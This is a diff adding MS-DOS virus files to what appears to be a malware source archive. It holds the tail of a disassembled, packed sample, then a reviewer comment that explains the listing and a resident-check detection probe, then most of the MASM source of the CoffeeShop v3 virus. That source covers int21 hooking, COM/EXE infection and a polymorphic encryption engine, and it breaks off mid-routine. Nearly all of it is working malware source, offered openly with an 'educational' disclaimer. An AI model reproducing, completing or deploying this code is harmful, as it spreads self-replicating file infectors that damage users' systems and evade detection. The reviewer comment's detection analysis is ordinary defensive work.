5Eh,0C0h + db 9Dh,0C4h, 82h, 15h, 08h,0DCh + db 20h, 14h, 90h, 60h, 20h, 43h + db 66h, 62h, 94h, 50h, 3Bh, 65h + db 0ECh, 5Eh,0A4h, 1Dh,0CFh, 70h + db 80h,0C2h, 20h, 8Ah, 0Eh,0B2h + db 62h, 2Ah,0ECh, 69h,0CCh, 5Eh + db 80h, 55h,0BEh, 0Bh,0C0h, 80h + db 62h, 41h, 0Eh, 04h, 72h,0FEh + db 56h, 05h, 6Eh, 10h, 01h,0D5h + db 41h,0AEh,0FEh,0CEh, 9Eh,0D1h + db 08h,0FEh,0C4h,0E9h, 5Ch,0E6h + db 0AAh, 62h,0CCh,0C0h,0C8h, 01h + db 62h, 39h,0ECh, 6Ch,0F2h, 9Dh + db 62h,0BCh, 94h, 48h, 41h, 28h + db 4Ah, 45h, 38h, 26h,0FEh, 52h + db 1Ch, 5Ah, 5Fh,0FEh,0BEh, 40h + db 02h, 84h,0F2h, 0Ah,0B8h,0AEh + db 70h,0FEh,0FCh, 8Eh, 12h, 6Ah + db 0DEh, 54h,0D8h, 61h,0ACh, 50h + db 0B1h, 43h, 3Eh, 72h, 80h,0A3h + db 60h, 48h, 6Ah, 82h, 0Eh, 96h + db 02h, 66h, 3Ah, 6Ch, 58h, 84h + db 0B4h,0D1h, 01h, 5Ah, 48h, 3Ah + db 0EAh, 44h, 70h, 0Bh,0E8h,0D8h + db 24h, 9Eh, 28h, 12h, 73h,0C6h + db 54h,0D0h,0FFh + db 0F0h,0FFh, 60h, 34h, 50h, 00h + db 00h,0FFh + +;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 +; SUBROUTINE +;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘 + +sub_14 proc near + shr bp,1 ; Shift w/zeros fill + dec dl + jnz loc_ret_38 ; Jump if not zero + lodsw ; String [si] to ax + mov bp,ax + mov dl,10h + +loc_ret_38: + retn +sub_14 endp + +loc_39: + call sub_14 + rcl bh,1 ; Rotate thru carry + call sub_14 + jc loc_42 ; Jump if carry Set + mov dh,2 + mov cl,3 + +locloop_40: + call sub_14 + jc loc_41 ; Jump if carry Set + call sub_14 + rcl bh,1 ; Rotate thru carry + shl dh,1 ; Shift w/zeros fill + loop locloop_40 ; Loop if cx > 0 + +loc_41: + sub bh,dh +loc_42: + mov dh,2 + mov cl,4 + +locloop_43: + inc dh + call sub_14 + jc loc_44 ; Jump if carry Set + loop locloop_43 ; Loop if cx > 0 + + call sub_14 + jnc loc_45 ; Jump if carry=0 + inc dh + call sub_14 + jnc loc_44 ; Jump if carry=0 + inc dh +loc_44: + mov cl,dh + jmp short locloop_51 +loc_45: + call sub_14 + jc loc_47 ; Jump if carry Set + mov cl,3 + mov dh,0 + +locloop_46: + call sub_14 + rcl dh,1 ; Rotate thru carry + loop locloop_46 ; Loop if cx > 0 + + 
add dh,9
+ jmp short loc_44
+loc_47:
+ lodsb ; String [si] to al
+ mov cl,al
+ add cx,11h
+ jmp short locloop_51
+loc_48:
+ mov cl,3
+
+locloop_49:
+ call sub_14
+ rcl bh,1 ; Rotate thru carry
+ loop locloop_49 ; Loop if cx > 0
+
+ dec bh
+loc_50:
+ mov cl,2
+
+locloop_51:
+ mov al,es:[bx+di]
+ stosb ; Store al to es:[di]
+ loop locloop_51 ; Loop if cx > 0
+
+loc_52:
+ call sub_14
+ jnc loc_53 ; Jump if carry=0
+ movsb ; Mov [si] to es:[di]
+ jmp short loc_52
+loc_53:
+ call sub_14
+ lodsb ; String [si] to al
+ mov bh,0FFh
+ mov bl,al
+ jc loc_39 ; Jump if carry Set
+ call sub_14
+ jc loc_48 ; Jump if carry Set
+ cmp bh,bl
+ jne loc_50 ; Jump if not equal
+ xor bp,bp ; Zero register
+ xor di,di ; Zero register
+ xor si,si ; Zero register
+ xor dx,dx ; Zero register
+ xor bx,bx ; Zero register
+ xor ax,ax ; Zero register
+ jmp $-1480h
+
+seg_a ends
+
+
+
+ end start
diff --git a/MSDOS/Virus.MSDOS.Unknown.coffshp3.asm b/MSDOS/Virus.MSDOS.Unknown.coffshp3.asm
new file mode 100644
index 00000000..bf2786e7
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.coffshp3.asm
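Review bot: Nothing in this listing says it is tool output rather than source: the banner `Created: 23-Jun-92 / Passes: 5 / Analysis Options on: AW` is a Sourcer disassembly header, and position-dependent forms such as `jmp $+1439h`, `call $-171Ch` and `jmp $-1480h` together with the long `db` runs mean it will not reassemble into the sample it was taken from. The stretch around `loc_33` (`in al,dx`, `esc 2,dl`, `hlt`) appears to be packed data decoded as code — its byte sequence matches the `beeld` table that the MASM sources elsewhere in this patch label "(packed) picture routine" — so it should be marked as such before anyone reads those mnemonics as virus logic. Suggest two comments under the banner: `; Sourcer disassembly of a captured CoffeeShop sample; not buildable source (author's MASM source: coffshp3.asm)` and `; the db runs between mov si,140h and sub_14, including what was decoded at loc_33, are packed picture data, not code`. Also worth a note at `mov ax,33DAh / int 21h / cmp ah,0A5h` that this is the resident-check handshake — coffshp3's `ni21` answers AX=33DAh with AH=0A5h — which gives responders a cheap in-memory detection probe for an infected session.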
@@ -0,0 +1,1674 @@ +;****************************************************************************** +;* CoffeeShop VIRUS version 3 +;* +;* Use MASM 4.0 to compile this source +;* (other assemblers will probably not produce the same result) +;* +;* Disclaimer: +;* This file is only for educational purposes. The author takes no +;* responsibility for anything anyone does with this file. Do not +;* modify this file! +;****************************************************************************** + + + .RADIX 16 + + +_TEXT segment + + assume cs:_TEXT, ds:_TEXT + + +VERSION equ 3 +PICLEN equ last - beeld ;length of picture routine +FILELEN equ last - first ;length of virus +FILEPAR equ (FILELEN + 0F)/10 ;length of virus in paragraphs +VIRPAR equ 00D0 ;space for resident virus +WORKPAR equ 0160 ;work space for engine +STACKOFF equ 1000 ;Stack offset +DATAPAR equ 0050 ;extra memory allocated +BUFLEN equ 1C ;length of buffer + + +;**************************************************************************** +;* data area for virus +;**************************************************************************** + + org 00E0 + +mutstack dw 0, 0 +oldlen dw 0, 0 +oi21 dw 0, 0 +minibuf db 0, 0, 0, 0 + + +;**************************************************************************** +;* data area for engine +;**************************************************************************** + +add_val dw 0 +xor_val dw 0 +xor_offset dw 0 +where_len dw 0 +where_len2 dw 0 +flags db 0 + + +;****************************************************************************** +;* Begin of virus, installation in memory +;****************************************************************************** + + org 0100 + +first: call next ;get IP +next: pop si + + sub si,low 3 ;SI = begin virus + mov di,0100 + cld + + push ax ;save registers + push ds + push es + push di + push si + + mov ah,30 ;DOS version >= 3.1? + int 21 + xchg ah,al + cmp ax,030A + jb not_install + + mov ax,33DA ;already resident? 
+ int 21 + cmp ah,0A5 + je not_install + + mov ax,es ;adjust memory-size + dec ax + mov ds,ax + xor bx,bx + cmp byte ptr [bx],5A + jne not_install + mov ax,[bx+3] + sub ax,(VIRPAR+WORKPAR) + jb not_install + mov [bx+3],ax + sub word ptr ds:[bx+12],(VIRPAR+WORKPAR) + + mov es,[bx+12] ;copy program to top + push cs + pop ds + mov cx,FILELEN + rep movsb + + push es + pop ds + + mov ax,3521 ;get original int21 vector + int 21 + mov ds:[oi21],bx + mov ds:[oi21+2],es + + mov dx,offset ni21 ;install new int21 handler + mov ax,2521 + int 21 + + mov ax,33DBh ;init. random nr. generator + int 21 + + mov ah,2A ;ask date + int 21 + cmp al,5 ;friday ? + jne not_install + mov ah,2C ;ask time + int 21 + or dh,dh ;sec = 0 ? + jnz not_install + + mov ax,33DC ;show picture + int 21 + +not_install: pop si ;restore registers + pop di + pop es + pop ds + pop ax + + add si,(offset buffer) + sub si,di + cmp byte ptr cs:[si],4Dh ;COM or EXE ? + je entryE + +entryC: push di + mov cx,BUFLEN + rep movsb + ret + +entryE: mov bx,ds ;calculate CS + add bx,low 10 + mov cx,bx + add bx,cs:[si+0E] + cli ;restore SS and SP + mov ss,bx + mov sp,cs:[si+10] + sti + add cx,cs:[si+16] + push cx ;push new CS on stack + push cs:[si+14] ;push new IP on stack + db 0CBh ;retf + + +;****************************************************************************** +;* Interupt 24 handler +;****************************************************************************** + +ni24: mov al,3 ;to avoid 'Abort, Retry, ...' + iret + + +;****************************************************************************** +;* Interupt 21 handler +;****************************************************************************** + +ni21: pushf + + cmp ax,33DA ;install-check ? + jne not_ic + mov ax,0A500+VERSION ;return a signature + popf + iret + +not_ic: push es ;save registers + push ds + push si + push di + push dx + push cx + push bx + push ax + + cmp ax,33DBh ;rnd init ? 
+ jne not_ri + call rnd_init + jmp short no_infect + +not_ri: cmp ax,33DC ;show picture? + je show_pic + +not_pi: cmp ax,4B00 ;execute ? + je do_it + + cmp ax,6C00 ;open DOS 4.0+ ? + jne no_infect + test bl,3 + jnz no_infect + mov dx,di + +do_it: call infect + +no_infect: pop ax ;restore registers + pop bx + pop cx + pop dx + pop di + pop si + pop ds + pop es + popf + +org21: jmp dword ptr cs:[oi21] ;call to old int-handler + + +;****************************************************************************** +;* Show picture +;****************************************************************************** + +show_pic: mov ax,offset no_infect ;push return adres on stack + push cs + push ax + + mov di,((VIRPAR*10)+0100) ;move picture routine + mov si,offset beeld + mov cx,PICLEN + push cs + pop ds + push cs + pop es + rep movsb + + mov ax,cs ;calculate segment registers + add ax,low VIRPAR + mov ds,ax + mov es,ax + + push ax ;push picture adres on stack + mov ax,0100 + push ax + + db 0CBh ;(retf) goto picture routine + + +;****************************************************************************** +;* Tries to infect the file +;****************************************************************************** + +infect: cld + + push cs ;copy filename to CS:0000 + pop es + mov si,dx + xor di,di + mov cx,0080 +namemove: lodsb + cmp al,0 + je moved + cmp al,'a' + jb char_ok + cmp al,'z' + ja char_ok + xor al,20 ;convert to upper case +char_ok: stosb + loop namemove +return0: ret + +moved: stosb ;put last zero after filename + lea si,[di-5] + push cs + pop ds + + lodsw ;check extension .COM or .EXE + cmp ax,'E.' + jne not_exe + lodsw + cmp ax,'EX' + jmp short check + +not_exe: cmp ax,'C.' 
+ jne return0 + lodsw + cmp ax,'MO' +check: jne return0 + + std ;find begin of filename + mov cx,si + inc cx +searchbegin: lodsb + cmp al,':' + je checkname + cmp al,'\' + je checkname + loop searchbegin + dec si + +checkname: cld ;check filename + lodsw + lodsw + mov di,offset names + mov cl,13 + repnz scasw + je return0 + + mov ax,3300 ;get ctrl-break flag + int 21 + push dx ;save flag on stack + + cwd ;clear the flag + inc ax + push ax + int 21 + + mov ax,3524 ;get int24 vector + int 21 + push es ;save vector on stack + push bx + + push cs + pop ds + + mov dx,offset ni24 ;install new int24 handler + mov ah,25 + push ax + int 21 + + mov ax,4300 ;ask file-attributes + cwd + int 21 + push cx ;save attributes on stack + + xor cx,cx ;clear attributes + mov ax,4301 + push ax + int 21 + jc return1v + + mov ax,3D02 ;open the file + int 21 + jnc opened +return1v: jmp return1 + +opened: xchg ax,bx ;save handle + + mov ax,5700 ;get file date & time + int 21 + push dx ;save date & time on stack + push cx + + mov cx,BUFLEN ;read begin of file + mov si,offset buffer + mov dx,si + call read + jc closev + + mov ax,4202 ;goto end, get filelength + xor cx,cx + cwd + int 21 + + mov di,offset oldlen ;save filelength + mov [di],ax + mov [di+2],dx + + mov ax,word ptr [si+12] ;already infected? + add al,ah + cmp al,'@' + jz closev + + cmp word ptr [si],'ZM' ;EXE ? + je do_EXE + +do_COM: test byte ptr [si],80 ;maybe a strange EXE? + jz closev + + mov ax,word ptr [di] ;check lenght of file + cmp ah,0D0 + jae closev + cmp ah,1 + jb closev + + mov dx,ax + add dx,0100 + call writeprog ;call Engine and write virus + jne closev + + mov byte ptr [si],0E9 ;put 'JMP xxxx' at begin + sub ax,low 3 + mov word ptr [si+1],ax + jmp done + +closev: jmp close + +do_EXE: cmp word ptr [si+18],40 ;is it a windows/OS2 EXE ? 
+ jb not_win + + mov ax,003C + cwd + call readbytes + jc closev + + mov ax,word ptr [di+8] + mov dx,word ptr [di+0A] + call readbytes + jc closev + + cmp byte ptr [di+9],'E' + je closev + +not_win: call getlen + call calclen ;check for internal overlays + cmp word ptr [si+4],ax + jne close + cmp word ptr [si+2],dx + jne close + + cmp word ptr [si+0C],0 ;high memory allocation? + je close + + cmp word ptr [si+1A],0 ;overlay nr. not zero? + jne close + + call getlen ;calculate new CS & IP + mov cx,0010 + div cx + sub ax,word ptr [si+8] + dec ax + add dx,low 10 + + call writeprog ;call Engine and write virus + jne close + + mov word ptr [si+16],ax ;put CS in header + mov word ptr [si+0E],ax ;put SS in header + mov word ptr [si+14],dx ;put IP in header + mov word ptr [si+10],STACKOFF ;put SP in header + + call getlen + add ax,cx + adc dx,0 + call calclen ;put new length in header + mov word ptr [si+4],ax + mov word ptr [si+2],dx + + lea di,[si+0A] ;adjust mem. allocation info + call mem_adjust + lea di,[si+0C] + call mem_adjust + +done: call gotobegin + call rnd_get ;signature + mov ah,'@' + sub ah,al + mov word ptr [si+12],ax + mov cx,BUFLEN ;write new begin + mov dx,si + mov ah,40 + int 21 + +close: pop cx ;restore date & time + pop dx + mov ax,5701 + int 21 + + mov ah,3E ;close the file + int 21 + +return1: pop ax ;restore attributes + pop cx + cwd + int 21 + + pop ax ;restore int24 vector + pop dx + pop ds + int 21 + + pop ax ;restore ctrl-break flag + pop dx + int 21 + + ret + + +;****************************************************************************** +;* Filenames to avoid +;****************************************************************************** + +names: db 'CO', 'SC', 'CL', 'VS', 'NE', 'HT', 'TB', 'VI' + db 'FI', 'GI', 'RA', 'FE', 'MT', 'BR', 'IM', ' ' + db ' ', ' ', ' ' + + +;****************************************************************************** +;* Write virus to the program 
+;******************************************************************************
+
+writeprog: push ax ;save registers
+ push dx
+ push si
+ push bp
+ push es
+
+ cli
+ mov word ptr [di-4],ss ;save SS & SP
+ mov word ptr [di-2],sp
+
+ mov ax,cs ;new stack & buffer-segment
+ mov ss,ax
+ mov sp,((VIRPAR + WORKPAR) * 10)
+ add ax,low VIRPAR
+ mov es,ax
+ sti
+
+ push ds
+
+ mov bp,dx ;input parameters for engine
+ mov dx,0100
+ mov cx,FILELEN
+ xor si,si
+ mov al,0Fh
+
+ push di
+ push bx
+
+ call crypt ;call the Engine
+
+ pop bx
+ pop di
+
+ push cx
+ push dx
+ mov ax,4202 ;goto end
+ xor cx,cx
+ cwd
+ int 21
+ pop dx
+ pop cx
+
+ mov ah,40 ;write virus
+ int 21
+ cmp ax,cx ;are all bytes written?
+
+ pop ds
+
+ cli
+ mov ss,word ptr [di-4] ;restore stack
+ mov sp,word ptr [di-2]
+ sti
+
+ pop es ;restore registers
+ pop bp
+ pop si
+ pop dx
+ pop ax
+
+ ret
+
+
+;******************************************************************************
+;* Adjust mem allocation info in EXE header
+;******************************************************************************
+
+mem_adjust: mov ax,[di]
+ sub ax,low FILEPAR ;alloc. may be this much less
+ jb more
+ cmp ax,DATAPAR ;minimum amount to allocate
+ jae mem_ok
+more: mov ax,DATAPAR
+mem_ok: mov [di],ax
+ ret
+
+
+;******************************************************************************
+;* Read a few bytes
+;******************************************************************************
+
+readbytes: call goto
+ mov dx,offset minibuf
+ mov cx,4
+read: mov ah,3F
+ int 21
+ ret
+
+
+;******************************************************************************
+;* Calculate length for EXE header
+;******************************************************************************
+
+calclen: mov cx,0200
+ div cx
+ or dx,dx
+ jz no_cor
+ inc ax
+no_cor: ret
+
+
+;******************************************************************************
+;* Get original length of program
+;******************************************************************************
+
+getlen: mov ax,[di]
+ mov dx,[di+2]
+ ret
+
+
+;******************************************************************************
+;* Goto new offset DX:AX
+;******************************************************************************
+
+gotobegin: xor ax,ax
+ cwd
+goto: xchg cx,dx
+ xchg ax,dx
+ mov ax,4200
+ int 21
+ ret
+
+
+;****************************************************************************
+;*
+;* Encryption Engine
+;*
+;*
+;* Input: ES work segment
+;* DS:DX code to encrypt
+;* BP what will be start of decryptor
+;* SI what will be distance between decryptor and code
+;* CX length of code
+;* AX flags: bit 0: DS will not be equal to CS
+;* bit 1: insert random instructions
+;* bit 2: put junk before decryptor
+;* bit 3: preserve AX with decryptor
+;*
+;* Output: ES: work segment (preserved)
+;* DS:DX decryptor + encrypted code
+;* BP what will be start of decryptor (preserved)
+;* DI length of decryptor / offset of encrypted code
+;* CX length of decryptor + encrypted code
+;* AX length of encrypted code
+;* (other registers may be trashed)
+;*
+;****************************************************************************
+
+ db '[ MK / Trident ]'
+
+crypt: xor di,di ;di = start of decryptor
+ push dx ;save offset of code
+ push si ;save future offset of code
+
+ mov byte ptr ds:[flags],al ;save flags
+ test al,8 ;push AX?
+ jz no_push
+ mov al,50
+ stosb
+
+no_push: call rnd_get ;add a few bytes to cx
+ and ax,1F
+ add cx,ax
+ push cx ;save length of code
+
+ call rnd_get ;get random flags
+ xchg ax,bx
+ ;BX flags:
+
+ ;0,1 how to encrypt
+ ;2,3 which register for encryption
+ ;4 use byte or word for encrypt
+ ;5 MOV AL, MOV AH or MOV AX
+ ;6 MOV CL, MOV CH or MOV CX
+ ;7 AX or DX
+
+ ;8 count up or down
+ ;9 ADD/SUB/INC/DEC or CMPSW/SCASW
+ ;A ADD/SUB or INC/DEC
+ ; CMPSW or SCASW
+ ;B offset in XOR instruction?
+ ;C LOOPNZ or LOOP
+ ; SUB CX or DEC CX
+ ;D carry with crypt ADD/SUB
+ ;E carry with inc ADD/SUB
+ ;F XOR instruction value or AX/DX
+
+random: call rnd_get ;get random encryption value
+ or al,al
+ jz random ;again if 0
+ mov ds:[xor_val],ax
+
+ call do_junk ;insert random instructions
+
+ pop cx
+
+ mov ax,0111 ;make flags to remember which
+ test bl,20 ; MOV instructions are used
+ jnz z0
+ xor al,07
+z0: test bl,0C
+ jnz z1
+ xor al,70
+z1: test bl,40
+ jnz z2
+ xor ah,7
+z2: test bl,10
+ jnz z3
+ and al,73
+z3: test bh,80
+ jnz z4
+ and al,70
+
+z4: mov dx,ax
+mov_lup: call rnd_get ;put MOV instructions in
+ and ax,000F ; a random order
+ cmp al,0A
+ ja mov_lup
+
+ mov si,ax
+ push cx ;test if MOV already done
+ xchg ax,cx
+ mov ax,1
+ shl ax,cl
+ mov cx,ax
+ and cx,dx
+ pop cx
+ jz mov_lup
+ xor dx,ax ;remember which MOV done
+
+ push dx
+ call do_mov ;insert MOV instruction
+ call do_nop ;insert a random NOP
+ pop dx
+
+ or dx,dx ;all MOVs done?
+ jnz mov_lup
+
+ push di ;save start of decryptor loop
+
+ call do_add_ax ;add a value to AX in loop?
+ call do_nop
+ test bh,20 ;carry with ADD/SUB ?
+ jz no_clc
+ mov al,0F8
+ stosb
+no_clc: mov word ptr ds:[xor_offset],0
+ call do_xor ;place all loop instructions
+ call do_nop
+ call do_add
+
+ pop dx ;get start of decryptor loop
+
+ call do_loop
+
+ test byte ptr ds:[flags],8 ;insert POP AX ?
+ jz no_pop
+ mov al,58
+ stosb
+
+no_pop: xor ax,ax ;calculate loop offset
+ test bh,1 ;up or down?
+ jz v1
+ mov ax,cx
+ dec ax
+ test bl,10 ;encrypt with byte or word?
+ jz v1
+ and al,0FE
+v1: add ax,di
+ add ax,bp
+ pop si
+ add ax,si
+ sub ax,word ptr ds:[xor_offset]
+ mov si,word ptr ds:[where_len]
+ test bl,0C ;are BL,BH used for encryption?
+ jnz v2
+ mov byte ptr es:[si],al
+ mov si,word ptr ds:[where_len2]
+ mov byte ptr es:[si],ah
+ jmp short v3
+v2: mov word ptr es:[si],ax
+
+v3: mov dx,word ptr ds:[xor_val] ;encryption value
+
+ pop si ;ds:si = start of code
+
+ push di ;save ptr to encrypted code
+ push cx ;save length of encrypted code
+
+ test bl,10 ;byte or word?
+ jz blup
+
+ inc cx ;cx = # of crypts (words)
+ shr cx,1
+
+lup: lodsw ;encrypt code (words)
+ call do_encrypt
+ stosw
+ loop lup
+ jmp short klaar
+
+
+blup: lodsb ;encrypt code (bytes)
+ xor dh,dh
+ call do_encrypt
+ stosb
+ loop blup
+
+klaar: mov cx,di ;cx = length decryptpr + code
+ pop ax ;ax = length of decrypted code
+ pop di ;di = offset encrypted code
+ xor dx,dx ;ds:dx = decryptor + cr. code
+ push es
+ pop ds
+ ret
+
+
+;****************************************************************************
+;* encrypt the code
+;****************************************************************************
+
+do_encrypt: add dx,word ptr ds:[add_val]
+ test bl,2
+ jnz lup1
+ xor ax,dx
+ ret
+
+lup1: test bl,1
+ jnz lup2
+ sub ax,dx
+ ret
+
+lup2: add ax,dx
+ ret
+
+
+;****************************************************************************
+;* generate mov reg,xxxx
+;****************************************************************************
+
+do_mov: mov dx,si
+ mov al,byte ptr ds:[si+mov_byte]
+ cmp dl,4 ;BX?
+ jne is_not_bx
+ call add_ind
+is_not_bx: test dl,0C ;A*?
+ pushf
+ jnz is_not_a
+ test bl,80 ;A* or D*?
+ jz is_not_a
+ add al,2
+
+is_not_a: call alter ;insert the MOV
+
+ popf ;A*?
+ jnz is_not_a2
+ mov ax,word ptr ds:[xor_val]
+ jmp short sss
+
+is_not_a2: test dl,8 ;B*?
+ jnz is_not_b
+ mov si,offset where_len
+ test dl,2
+ jz is_not_bh
+ add si,2
+is_not_bh: mov word ptr ds:[si],di
+ jmp short sss
+
+is_not_b: mov ax,cx ;C*
+ test bl,10 ;byte or word encryption?
+ jz sss
+ inc ax ;only half the number of bytes
+ shr ax,1
+sss: test dl,3 ;byte or word register?
+ jz is_x
+ test dl,2 ;*H?
+ jz is_not_h
+ xchg al,ah
+is_not_h: stosb
+ ret
+
+is_x: stosw
+ ret
+
+
+;****************************************************************************
+;* insert MOV or alternative for MOV
+;****************************************************************************
+
+alter: push bx
+ push cx
+ push ax
+ call rnd_get
+ xchg ax,bx
+ pop ax
+ test bl,3 ;use alternative for MOV?
+ jz no_alter
+
+ push ax
+ and bx,0F
+ and al,08
+ shl ax,1
+ or bx,ax
+ pop ax
+
+ and al,7
+ mov cl,9
+ xchg ax,cx
+ mul cl
+
+ add ax,30C0
+ xchg al,ah
+ test bl,4
+ jz no_sub
+ mov al,28
+no_sub: call maybe_2
+ stosw
+
+ mov al,80
+ call maybe_2
+ stosb
+
+ mov ax,offset add_mode
+ xchg ax,bx
+ and ax,3
+ xlat
+
+ add al,cl
+no_alter: stosb
+ pop cx
+ pop bx
+ ret
+
+
+;****************************************************************************
+;* insert ADD AX,xxxx
+;****************************************************************************
+
+do_add_ax: push cx
+ mov si,offset add_val ;save add-value here
+ mov word ptr ds:[si],0
+ mov ax,bx
+ and ax,8110
+ xor ax,8010
+ jnz no_add_ax ;use ADD?
+
+ mov ax,bx
+ xor ah,ah
+ mov cl,3
+ div cl
+ or ah,ah
+ jnz no_add_ax ;use ADD?
+
+ test bl,80
+ jnz do_81C2 ;AX or DX?
+ mov al,5
+ stosb
+ jmp short do_add0
+do_81C2: mov ax,0C281
+ stosw
+do_add0: call rnd_get
+ mov word ptr ds:[si],ax
+ stosw
+no_add_ax: pop cx
+ ret
+
+
+;****************************************************************************
+;* generate encryption command
+;****************************************************************************
+
+do_xor: test byte ptr ds:[flags],1
+ jz no_cs
+ mov al,2E ;insert CS: instruction
+ stosb
+
+no_cs: test bh,80 ;type of XOR command
+ jz xor1
+
+ call get_xor ;encrypt with register
+ call do_carry
+ call save_it
+ xor ax,ax
+ test bl,80
+ jz xxxx
+ add al,10
+xxxx: call add_dir
+ test bh,8
+ jnz yyyy
+ stosb
+ ret
+
+yyyy: or al,80
+ stosb
+ call rnd_get
+ stosw
+ mov word ptr ds:[xor_offset],ax
+ ret
+
+xor1: mov al,080 ;encrypt with value
+ call save_it
+ call get_xor
+ call do_carry
+ call xxxx
+ mov ax,word ptr ds:[xor_val]
+ test bl,10
+ jmp byte_word
+
+
+;****************************************************************************
+;* generate increase/decrease command
+;****************************************************************************
+
+do_add: test bl,8 ;no CMPSW/SCASW if BX is used
+ jz da0
+ test bh,2 ;ADD/SUB/INC/DEC or CMPSW/SCASW
+ jnz do_cmpsw
+
+da0: test bh,4 ;ADD/SUB or INC/DEC?
+ jz add1
+
+ mov al,40 ;INC/DEC
+ test bh,1 ;up or down?
+ jz add0
+ add al,8
+add0: call add_ind
+ stosb
+ test bl,10 ;byte or word?
+ jz return
+ stosb ;same instruction again
+return: ret
+
+add1: test bh,40 ;ADD/SUB
+ jz no_clc2 ;carry?
+ mov al,0F8 ;insert CLC
+ stosb
+no_clc2: mov al,083
+ stosb
+ mov al,0C0
+ test bh,1 ;up or down?
+ jz add2
+ mov al,0E8
+add2: test bh,40 ;carry?
+ jz no_ac2
+ and al,0CF
+ or al,10
+no_ac2: call add_ind
+ stosb
+ mov al,1 ;value to add/sub
+save_it: call add_1
+ stosb
+ ret
+
+do_cmpsw: test bh,1 ;up or down?
+ jz no_std
+ mov al,0FDh ;insert STD
+ stosb
+no_std: test bh,4 ;CMPSW or SCASW?
+ jz normal_cmpsw
+ test bl,4 ;no SCASW if SI is used
+ jnz do_scasw
+
+normal_cmpsw: mov al,0A6 ;CMPSB
+ jmp short save_it
+do_scasw: mov al,0AE ;SCASB
+ jmp short save_it
+
+
+;****************************************************************************
+;* generate loop command
+;****************************************************************************
+
+do_loop: test bh,1 ;no JNE if couting down
+ jnz loop_loop ; (prefetch bug!)
+ call rnd_get
+ test al,1 ;LOOPNZ/LOOP or JNE?
+ jnz cx_loop
+
+loop_loop: mov al,0E0
+ test bh,1A ;LOOPNZ or LOOP?
+ jz ll0 ; no LOOPNZ if xor-offset
+ add al,2 ; no LOOPNZ if CMPSW/SCASW
+ll0: stosb
+ mov ax,dx
+ sub ax,di
+ dec ax
+ stosb
+ ret
+
+cx_loop: test bh,10 ;SUB CX or DEC CX?
+ jnz cxl_dec
+ mov ax,0E983
+ stosw
+ mov al,1
+ stosb
+ jmp short do_jne
+
+cxl_dec: mov al,49
+ stosb
+do_jne: mov al,75
+ jmp short ll0
+
+
+;****************************************************************************
+;* add value to AL depending on register type
+;****************************************************************************
+
+add_dir: mov si,offset dir_change
+ jmp short xx1
+
+add_ind: mov si,offset ind_change
+xx1: push bx
+ shr bl,1
+ shr bl,1
+ and bx,3
+ add al,byte ptr ds:[bx+si]
+ pop bx
+ ret
+
+
+;****************************************************************************
+;* mov encryption command byte to AL
+;****************************************************************************
+
+get_xor: push bx
+ mov ax,offset how_mode
+ xchg ax,bx
+ and ax,3
+ xlat
+ pop bx
+ ret
+
+
+;****************************************************************************
+;* change ADD into ADC
+;****************************************************************************
+
+do_carry: test bl,2 ;ADD/SUB used for encryption?
+ jz no_ac
+ test bh,20 ;carry with (encr.) ADD/SUB?
+ jz no_ac
+ and al,0CF
+ or al,10
+no_ac: ret
+
+
+;****************************************************************************
+;* change AL (byte/word)
+;****************************************************************************
+
+add_1: test bl,10
+ jz add_1_ret
+ inc al
+add_1_ret: ret
+
+
+;****************************************************************************
+;* change AL (byte/word)
+;****************************************************************************
+
+maybe_2: call add_1
+ cmp al,81 ;can't touch this
+ je maybe_not
+ push ax
+ call rnd_get
+ test al,1
+ pop ax
+ jz maybe_not
+ add al,2
+maybe_not: ret
+
+
+;****************************************************************************
+;* get random nop (or not)
+;****************************************************************************
+
+do_nop: test byte ptr ds:[flags],2
+ jz no_nop
+yes_nop: call rnd_get
+ test al,3
+ jz nop8
+ test al,2
+ jz nop16
+ test al,1
+ jz nop16x
+no_nop: ret
+
+
+;****************************************************************************
+;* Insert random instructions
+;****************************************************************************
+
+do_junk: test byte ptr ds:[flags],4
+ jz no_junk
+ call rnd_get ;put a random number of
+ and ax,0F ; dummy instructions before
+ inc ax ; decryptor
+ xchg ax,cx
+junk_loop: call junk
+ loop junk_loop
+no_junk: ret
+
+
+;****************************************************************************
+;* get rough random nop (may affect register values)
+;****************************************************************************
+
+junk: call rnd_get
+ and ax,1E
+ jmp short aa0
+nop16x: call rnd_get
+ and ax,06
+aa0: xchg ax,si
+ call rnd_get
+ jmp word ptr ds:[si+junkcals]
+
+
+;****************************************************************************
+;* NOP and junk addresses
+;****************************************************************************
+
+junkcals dw offset nop16x0
+ dw offset nop16x1
+ dw offset nop16x2
+ dw offset nop16x3
+ dw offset nop8
+ dw offset nop16
+ dw offset junk6
+ dw offset junk7
+ dw offset junk8
+ dw offset junk9
+ dw offset junkA
+ dw offset junkB
+ dw offset junkC
+ dw offset junkD
+ dw offset junkE
+ dw offset junkF
+
+
+;****************************************************************************
+;* NOP and junk routines
+;****************************************************************************
+
+nop16x0: and ax,000F ;J* 0000 (conditional)
+ or al,70
+ stosw
+ ret
+
+
+nop16x1: mov al,0EBh ;JMP xxxx / junk
+ and ah,07
+ inc ah
+ stosw
+ xchg al,ah ;get lenght of bullshit
+ cbw
+ jmp fill_bullshit
+
+
+nop16x2: call junkD ;XCHG AX,reg / XCHG AX,reg
+ stosb
+ ret
+
+
+nop16x3: call junkF ;INC / DEC or DEC / INC
+ xor al,8
+ stosb
+ ret
+
+
+nop8: push bx ;8-bit NOP
+ and al,7
+ mov bx,offset nop_data8
+ xlat
+ stosb
+ pop bx
+ ret
+
+
+nop16: push bx ;16-bit NOP
+ and ax,0303
+ mov bx,offset nop_data16
+ xlat
+ add al,ah
+ stosb
+ call rnd_get
+ and al,7
+ mov bl,9
+ mul bl
+ add al,0C0
+ stosb
+ pop bx
+ ret
+
+
+junk6: push cx ;CALL xxxx / junk / POP reg
+ mov al,0E8
+ and ah,0F
+ inc ah
+ stosw
+ xor al,al
+ stosb
+ xchg al,ah
+ call fill_bullshit
+ call do_nop
+ call rnd_get ;insert POP reg
+ and al,7
+ call no_sp
+ mov cx,ax
+ or al,58
+ stosb
+
+ test ch,3 ;more?
+ jnz junk6_ret
+
+ call do_nop
+ mov ax,0F087 ;insert XCHG SI,reg
+ or ah,cl
+ test ch,8
+ jz j6_1
+ mov al,8Bh
+j6_1: stosw
+
+ call do_nop
